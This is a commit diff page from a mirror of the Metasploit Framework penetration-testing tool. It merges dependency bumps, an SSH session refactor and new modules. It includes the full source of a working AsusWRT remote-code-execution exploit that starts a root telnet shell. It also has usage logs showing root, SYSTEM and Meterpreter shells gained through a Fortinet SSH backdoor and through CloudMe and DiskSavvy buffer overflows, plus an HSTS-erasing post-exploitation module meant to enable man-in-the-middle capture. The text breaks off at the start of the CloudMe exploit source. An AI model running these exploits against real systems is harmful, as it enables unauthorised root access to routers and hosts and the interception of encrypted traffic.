infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into land-9607-

MS-2855/keylogger-mettle-extension
Brent Cook 2018-02-23 11:09:20 -06:00
parent f10d58bc2d 7663e5c1f6
commit cd728defed
36 changed files with 869 additions and 100 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
Gemfile.lock
View File

@ -59,7 +59,7 @@ PATH
rex-text
rex-zip
ruby-macho
ruby_smb
ruby_smb (= 0.0.18)
rubyntlm
rubyzip
sqlite3
@ -125,11 +125,11 @@ GEM
railties (>= 3.0.0)
faker (1.8.7)
i18n (>= 0.7)
faraday (0.13.1)
faraday (0.14.0)
multipart-post (>= 1.2, < 3)
filesize (0.1.1)
fivemat (1.3.5)
google-protobuf (3.5.1)
google-protobuf (3.5.1.2)
googleapis-common-protos-types (1.0.1)
google-protobuf (~> 3.0)
googleauth (0.6.2)
@ -140,12 +140,12 @@ GEM
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.8.3)
grpc (1.9.1)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (>= 0.5.1, < 0.7)
hashery (2.1.2)
i18n (0.9.1)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2)
rkelly-remix
@ -155,7 +155,7 @@ GEM
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.1.1)
loofah (2.2.0)
crass (~> 1.0.2)
nokogiri (>= 1.5.9)
memoist (0.16.0)
@ -167,7 +167,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-credential (2.0.12)
metasploit-credential (2.0.13)
metasploit-concern
metasploit-model
metasploit_data_models
@ -194,7 +194,7 @@ GEM
metasploit_payloads-mettle (0.3.7)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.11.1)
minitest (5.11.3)
mqtt (0.5.0)
msgpack (1.2.2)
multi_json (1.13.1)
@ -203,7 +203,7 @@ GEM
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.2.0)
nokogiri (1.8.1)
nokogiri (1.8.2)
mini_portile2 (~> 2.3.0)
octokit (4.8.0)
sawyer (~> 0.8.0, >= 0.5.3)
@ -214,7 +214,7 @@ GEM
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
pdf-reader (2.0.0)
pdf-reader (2.1.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
@ -229,7 +229,7 @@ GEM
pry (0.11.3)
coderay (~> 1.1.0)
method_source (~> 0.9.0)
public_suffix (3.0.1)
public_suffix (3.0.2)
rack (1.6.8)
rack-test (0.6.3)
rack (>= 1.0)
@ -320,7 +320,7 @@ GEM
rspec-support (~> 3.7.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.7.0)
rspec-support (3.7.1)
ruby-macho (1.1.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18)
@ -348,7 +348,7 @@ GEM
thread_safe (0.3.6)
timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.4)
tzinfo (1.2.5)
thread_safe (~> 0.1)
tzinfo-data (1.2018.3)
tzinfo (>= 1.0.0)

63
documentation/modules/auxiliary/scanner/ssh/fortinet_backdoor.md Normal file
View File

@ -0,0 +1,63 @@
## Intro
This module scans for the Fortinet SSH backdoor and creates sessions.
## Setup
1. `git clone https://github.com/nixawk/labs`
2. Import `FortiGate-Backdoor-VM/FortiGate-VM.ovf` into VMware
3. <http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm>
## Usage
```
msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
rhosts => 192.168.212.0/24
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
threads => 100
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
[*] Scanned 54 of 256 hosts (21% complete)
[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
[*] Scanned 65 of 256 hosts (25% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 141 of 256 hosts (55% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 240 of 256 hosts (93% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
[*] Starting interaction with 1...
FortiGate-VM # get system status
Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
Extreme DB: 1.00000(2012-10-17 15:47)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2000-00-00 00:00)
Serial-Number: FGVM00UNLICENSED
Botnet DB: 1.00000(2012-05-28 22:51)
License Status: Evaluation license expired
Evaluation License Expires: Thu Jan 28 13:05:41 2016
BIOS version: 04000002
Log hard disk: Need format
Hostname: FortiGate-VM
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 228
Release Version Information: GA Patch 4
System time: Wed Feb 21 13:13:43 2018
FortiGate-VM #
```

70
documentation/modules/exploit/linux/http/asuswrt_lan_rce.md Normal file
View File

@ -0,0 +1,70 @@
## Description
This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
## Vulnerable Application
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
Numerous ASUS models are reportedly affected, but untested.
## Verification Steps
1. Start `msfconsole`
2. `use exploits/linux/http/asuswrt_lan_rce`
3. `set RHOST [IP]`
4. `run`
5. You should get a *root* session
## Options
**ASUSWRTPORT**
AsusWRT HTTP portal port (default: `80`)
## Scenarios
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run
[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600
id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type : Broadcom BCM53572 chip rev 1 pkg 8
processor : 0
cpu model : MIPS 74K V4.9
BogoMIPS : 149.91
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : no
hardware watchpoint : yes
ASEs implemented : mips16 dsp
shadow register sets : 1
VCED exceptions : not available
VCEI exceptions : not available
unaligned_instructions : 0
dcache hits : 2147483648
dcache misses : 0
icache hits : 2147483648
icache misses : 0
instructions : 2147483648
/ #

41
documentation/modules/exploit/windows/misc/cloudme_sync.md Normal file
View File

@ -0,0 +1,41 @@
## Description
This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe).
## Verification Steps
1. Install CloudMe for Desktop version `v1.10.9`
2. Start the applicaton (you don't need to create an account)
3. Start `msfconsole`
4. Do `use exploit/windows/misc/cloudme_sync`
5. Do `set RHOST ip`
6. Do `set LHOST ip`
7. Do `exploit`
8. Verify the Meterpreter session is opened
## Scenarios
### CloudMe Sync client application on Windows 7 SP1 x86
```
msf > use exploit/windows/misc/cloudme_sync
msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
RHOST => 172.16.40.148
msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(windows/misc/cloudme_sync) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (179779 bytes) to 172.16.40.148
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```

39
documentation/modules/exploit/windows/misc/disk_savvy_adm.md Normal file
View File

@ -0,0 +1,39 @@
## Vulnerable Application
[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
## Verification Steps
1. Install a vulnerable DiskSavvy Enterprise
2. Start `msfconsole`
3. Do `use exploit/windows/misc/disk_savvy_adm`
4. Do `set RHOST ip`
5. Do `set PAYLOAD windows/shell/bind_tcp`
6. Do `exploit`
7. Enjoy your shell
## Scenarios
### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
```
msf > use exploit/windows/misc/disk_savvy_adm
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
RHOST => 192.168.216.55
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(windows/misc/disk_savvy_adm) > exploit
[*] Started bind handler
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.216.55
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```

62
documentation/modules/post/multi/manage/hsts_eraser.md Normal file
View File

@ -0,0 +1,62 @@
This module allows you to erase the [HTTP Strict-Transport-Security](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) cache of a target machine. When combined with a sniffer or a man-in-the-middle tool, this module will assist with the capture/modification of TLS-encrypted traffic.
**WARNING:** This module _erases_ the HSTS cache, leaving the target in a vulnerable state. All browser traffic from all users on the target will be subject to man-in-the-middle attacks. There is no undo built-into this module. If you intend to revert, you must first backup the HSTS file before running the module.
Note: This module searches for all non-root users on the system. It will not erase HSTS data for the root user.
## Vulnerable Application
The following platforms are supported:
* Windows
* Linux
* OS X
## Verification Steps
1. Obtain and background a session from the target machine.
2. From the `msf>` prompt, do ```use post/multi/manage/hsts_eraser```
3. Set the ```DISCLAIMER``` option to ```True``` (after reading the above **WARNING**)
4. Set the ```SESSION``` option
5. ```run```
Alternatively:
1. Obtain a session from the target machine.
2. From the `meterpreter>` prompt, do ```run post/multi/manage/hsts_eraser DISCLAIMER=True```
## Demo
Set up a Kali VM with some HSTS data:
```bash
root@kali-2017:~# adduser bob
root@kali-2017:~# su bob
bob@kali-2017:/root$ cd
bob@kali-2017:~$ wget -S https://outlook.live.com/owa/ 2>&1 | grep -i strict
Strict-Transport-Security: max-age=31536000; includeSubDomains
Strict-Transport-Security: max-age=31536000; includeSubDomains
bob@kali-2017:~$ cat .wget-hsts
# HSTS 1.0 Known Hosts database for GNU Wget.
# Edit at your own risk.
# <hostname> <port> <incl. subdomains> <created> <max-age>
outlook.live.com 0 1 1519176414 31536000
```
Create an `msfvenom` payload, execute it, and then connect to it with `multi/exploit/handler`. From the Meterpreter session on the victim:
```
[*] Meterpreter session 1 opened (127.0.0.1:38089 -> 127.0.0.1:44444) at 2018-02-20 19:19:02 -0600
meterpreter > run post/multi/manage/hsts_eraser DISCLAIMER=True
[*] Removing wget HSTS database for bob...
[*] HSTS databases removed! Now enjoy your favorite sniffer! ;-)
```
Confirm that the file was deleted:
```bash
bob@kali-2017:~$ cat .wget-hsts
cat: .wget-hsts: No such file or directory
```

40
lib/msf/core/exploit/fortinet.rb
View File

@ -1,5 +1,6 @@
# -*- coding: binary -*-
# https://www.ietf.org/rfc/rfc4252.txt
# https://www.ietf.org/rfc/rfc4256.txt
require 'net/ssh'
@ -11,7 +12,33 @@ module Msf::Exploit::Remote::Fortinet
USERAUTH_INFO_RESPONSE = 61
def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' }
send_message(userauth_request(
=begin
string user name
string service name
string "password"
boolean FALSE
string plaintext password in ISO-10646 UTF-8 encoding [RFC3629]
=end
username,
service_name,
'password',
false,
password || ''
))
loop do
message = session.next_message
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' }
send_message(userauth_request(
=begin
@ -27,17 +54,6 @@ module Msf::Exploit::Remote::Fortinet
'',
''
))
loop do
message = session.next_message
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
return false
when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }

2
lib/msf/core/modules/external/python/metasploit/module.py vendored
View File

@ -29,7 +29,7 @@ def report_vuln(ip, name, **opts):
def run(metadata, module_callback):
req = json.loads(os.read(0, 10000))
req = json.loads(os.read(0, 10000).decode("utf-8"))
if req['method'] == 'describe':
rpc_send({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata})
elif req['method'] == 'run':

63
lib/net/ssh/command_stream.rb
View File

@ -15,7 +15,34 @@ class CommandStream
attr_accessor :localinfo
end
def initialize(ssh, cmd, cleanup = false)
def shell_requested(channel, success)
raise "could not request ssh shell" unless success
channel[:data] = ''
channel.on_eof do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
channel.on_close do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
channel.on_data do |ch,data|
self.rsock.write(data)
end
channel.on_extended_data do |ch, ctype, data|
self.rsock.write(data)
end
self.channel = channel
end
def initialize(ssh, cmd = nil, cleanup = true)
self.lsock, self.rsock = Rex::Socket.tcp_socket_pair()
self.lsock.extend(Rex::IO::Stream)
@ -23,7 +50,7 @@ class CommandStream
self.rsock.extend(Rex::IO::Stream)
self.ssh = ssh
self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup|
self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup|
begin
info = rssh.transport.socket.getpeername_as_array
@ -33,32 +60,10 @@ class CommandStream
self.lsock.localinfo = "#{info[1]}:#{info[2]}"
rssh.open_channel do |rch|
rch.exec(rcmd) do |c, success|
raise "could not execute command: #{rcmd.inspect}" unless success
c[:data] = ''
c.on_eof do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
c.on_close do
self.rsock.close rescue nil
self.ssh.close rescue nil
self.thread.kill
end
c.on_data do |ch,data|
self.rsock.write(data)
end
c.on_extended_data do |ch, ctype, data|
self.rsock.write(data)
end
self.channel = c
if cmd.nil?
rch.send_channel_request("shell", &method(:shell_requested))
else
rch.exec(rsh, &method(:shell_requested))
end
end
@ -85,7 +90,7 @@ class CommandStream
end
# Shut down the SSH session if requested
if(rcleanup)
if rcleanup
rssh.close
end
end

2
metasploit-framework.gemspec
View File

@ -127,7 +127,7 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'mqtt'
spec.add_runtime_dependency 'net-ssh'
spec.add_runtime_dependency 'bcrypt_pbkdf'
spec.add_runtime_dependency 'ruby_smb'
spec.add_runtime_dependency 'ruby_smb', '0.0.18'
#
# REX Libraries

13
modules/auxiliary/scanner/finger/finger_users.rb
View File

@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
finger_zero
finger_dot
finger_chars
vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}"
vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users"
finger_list
rescue ::Rex::ConnectionError
@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary
# No such file or directory == valid user bad utmp
case line
when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/
# Solaris
if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/)
uid = $1
if ($2 != "Name")
@users[uid] ||= {}
end
end
when /^\s*Login name:\s*([^\s]+)\s+/i
# IRIX
if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i)
uid = $1
@users[uid] ||= {} if uid
end
when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i
# Debian GNU/Linux
if(line =~ /^\s*Username:\s*([^\s]+)\s+/i)
uid = $1
@users[uid] ||= {} if uid
end

2
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -232,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary
# No password change required moving on.
# Check for valid login but no mailbox setup
print_good("server type: #{res.headers["X-FEServer"]}")
if res.headers['location'] =~ /owa/
if res.headers['location'] =~ /owa/ and res.headers['location'] !~ /reason/
print_good("#{msg} SUCCESSFUL LOGIN. #{elapsed_time} '#{user}' : '#{pass}'")
report_cred(
ip: res.peerinfo['addr'],

30
modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
View File

@ -3,10 +3,14 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
# XXX: This shouldn't be necessary but is now
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Exploit::Remote::Fortinet
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::CommandShell
include Msf::Auxiliary::Report
def initialize(info = {})
@ -45,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary
ssh_opts = {
port: rport,
# The auth method is converted into a class name for instantiation,
# so fortinet-backdoor here becomes FortinetBackdoor from the mixin
auth_methods: ['fortinet-backdoor'],
non_interactive: true,
config: false,
@ -63,15 +69,33 @@ class MetasploitModule < Msf::Auxiliary
return
end
if ssh
return unless ssh
print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access")
version = ssh.transport.server_version.version
report_vuln(
host: ip,
name: self.name,
refs: self.references,
info: ssh.transport.server_version.version
info: version
)
end
shell = Net::SSH::CommandStream.new(ssh)
return unless shell
info = "Fortinet SSH Backdoor (#{version})"
ds_merge = {
'USERNAME' => 'Fortimanager_Access'
}
start_session(self, info, ds_merge, false, shell.lsock)
# XXX: Ruby segfaults if we don't remove the SSH socket
remove_socket(ssh.transport.socket)
end
def rport

2
modules/auxiliary/scanner/ssh/ssh_login.rb
View File

@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
return unless ssh_socket
# Create a new session
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
merge_me = {
'USERPASS_FILE' => nil,

2
modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
View File

@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
return unless ssh_socket
# Create a new session from the socket
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
# Clean up the stored data - need to stash the keyfile into
# a datastore for later reuse.

14
modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py
View File

@ -9,9 +9,13 @@ import os
import ssl
# extra modules
import gmpy2
from cryptography import x509
from cryptography.hazmat.backends import default_backend
dependencies_missing = False
try:
import gmpy2
from cryptography import x509
from cryptography.hazmat.backends import default_backend
except ImportError:
dependencies_missing = True
from metasploit import module
@ -151,6 +155,10 @@ def oracle(target, pms, cke_2nd_prefix, cipher_handshake=ch_def, messageflow=Fal
def run(args):
if dependencies_missing:
module.log("Module dependencies (gmpy2 and cryptography python libraries) missing, cannot continue", level='error')
return
target = (args['rhost'], int(args['rport']))
timeout = float(args['timeout'])
cipher_handshake = cipher_handshakes[args['cipher_group']]

2
modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
View File

@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end

132
modules/exploits/linux/http/asuswrt_lan_rce.rb Normal file
View File

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',
'Description' => %q{
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
perform a POST in certain cases. This can be combined with another vulnerability in
the VPN configuration upload routine that sets NVRAM configuration variables directly
from the POST request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to infosvr, which is running
on port UDP 9999 to directly execute commands as root.
This exploit leverages that to start telnetd in a random port, and then connects to it.
It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
['CVE', '2018-5999'],
['CVE', '2018-6000']
],
'Targets' =>
[
[ 'AsusWRT < v3.0.0.4.384.10007',
{
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
}
],
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DisclosureDate' => 'Jan 22 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9999)
])
register_advanced_options(
[
OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])
])
end
def exploit
# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
post_data = Rex::MIME::Message.new
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => "/vpnupload.cgi",
'method' => 'POST',
'rport' => datastore['ASUSWRTPORT'],
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res and res.code == 200
print_good("#{peer} - Successfully set the ateCommand_flag variable.")
else
fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
end
# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
info_pdu_size = 512 # expected packet size, not sure what the extra bytes are
r = Random.new
ibox_comm_pkt_hdr_ex =
[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC
[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15
[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33
r.bytes(4) + # Info, don't know what this is
r.bytes(6) + # MAC address
r.bytes(32) # Password
telnet_port = rand((2**16)-1024)+1024
cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*')
pkt_syscmd =
[cmd.length,0x00].pack('C*') + # cmd length
cmd # our command
pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)
connect_udp
udp_sock.put(pkt_final) # we could process the response, but we don't care
disconnect_udp
print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}")
sleep(10)
begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })
if not sock.nil?
print_good("#{peer} - Success, shell incoming!")
return handler(sock)
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
sock.close if sock
end
print_bad("#{peer} - Well that didn't work... try again?")
end
end

2
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
View File

@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn

2
modules/exploits/linux/ssh/exagrid_known_privkey.rb
View File

@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn

2
modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
View File

@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
return false unless ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
conn
end

2
modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
View File

@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn

2
modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
View File

@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn

2
modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
View File

@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true)
conn = Net::SSH::CommandStream.new(ssh, 'shell-escape')
return conn
end

2
modules/exploits/linux/ssh/symantec_smg_ssh.rb
View File

@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
if ssh
conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end

2
modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb
View File

@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
private: private_key,
private_type: :ssh_key
)
return Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
return Net::SSH::CommandStream.new(ssh)
end
nil

2
modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
View File

@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
conn = Net::SSH::CommandStream.new(ssh_socket)
self.sockets.delete(ssh_socket.transport.socket)
return conn

2
modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb
View File

@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote
# Make the SSH connection and execute our commands + payload
print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!")
Net::SSH::CommandStream.new(ssh, build_command, true)
Net::SSH::CommandStream.new(ssh, build_command)
end
end

2
modules/exploits/unix/ssh/tectia_passwd_changereq.rb
View File

@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
message = transport.next_message.type
if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT
shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true)
shell = Net::SSH::CommandStream.new(connection)
connection = nil
return shell
end

67
modules/exploits/windows/misc/cloudme_sync.rb Normal file
View File

@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
